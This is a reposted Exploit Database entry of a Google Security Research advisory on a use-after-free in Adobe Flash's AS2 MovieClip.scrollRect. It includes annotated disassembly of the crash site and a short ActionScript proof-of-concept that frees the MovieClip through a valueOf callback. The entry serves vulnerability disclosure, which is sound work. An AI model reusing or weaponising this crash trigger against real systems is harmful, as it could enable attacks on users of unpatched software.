Adobe Flash AS2 – MovieClip.scrollRect Use-After-Free

• Exploit Database
• 14 阅读

• 作者： Google Security Research
  日期： 2015-08-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37854/

• Source: https://code.google.com/p/google-security-research/issues/detail?id=359&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
  
  [Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=482521]
  
  ---
  VULNERABILITY DETAILS
  When setting the scrollRect attribute of a MovieClip in AS2 with a custom Rectangle it is possible to free the MovieClip while a reference remains 
  in the stack
  
  VERSION
  Chrome Version: Chrome stable 42.0.2311.90, Flash 17.0.0.169
  Operating System: [Win 7 SP1]
  
  REPRODUCTION CASE
  That code targets the MovieClip.scrollRect property. While setting this attribute with a custom Rectangle, it is possible to trigger a use after free by freeing the targeted MovieClip. Creating a TextField with the same depth of the targeted MovieClip is enough to free an object and have Flash crash.
  
  These lines come from flashplayer standalone 17.0.0.169:
  
  .text:00597F45 loc_597F45:
  .text:00597F45 cmp eax, 6
  .text:00597F48 jnz loc_597FE5
  .text:00597F4E mov ecx, esi ; esi points to the MovieClip object
  .text:00597F50 callsub_40C1ED
  .text:00597F55 add eax, 30Ch
  .text:00597F5A ordword ptr [eax], 8
  .text:00597F5D mov eax, [ebx]
  .text:00597F5F mov byte ptr [eax+82Ch], 1
  .text:00597F66 mov ecx, [ebx]
  .text:00597F68 lea eax, [ebp+74h+var_1C0]
  .text:00597F6E pusheax
  .text:00597F6F pushdword ptr [ebx+0Ch]
  .text:00597F72 callxfetchRectangleProperties; get the Rectangle properties, and execute some AS2
  .text:00597F77 testal, al
  .text:00597F79 jzloc_598274
  .text:00597F7F mov edi, [ebp+74h+var_1C0]
  .text:00597F85 mov ecx, esi
  .text:00597F87 imuledi, 14h
  .text:00597F8A callsub_40C1ED; reference freed memory and return a bad 
  
  pointer
  .text:00597F8F mov [eax+310h], edi ; crash here, eax = 0
  
  
  
  Poc (compile with Flash CS5.5):
  
  import flash.geom.Rectangle
  var o2 = {}
  o2.valueOf = function () {
  	_global.mc.createTextField("newtf",1,1,1,2,3)
  	return 7
  }
  var o = {x:o2,y:0,width:4,height:5}
  
  _global.mc = this
  var newmc:MovieClip = this.createEmptyMovieClip("newmc",1)
  newmc.scrollRect = o
  ---
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip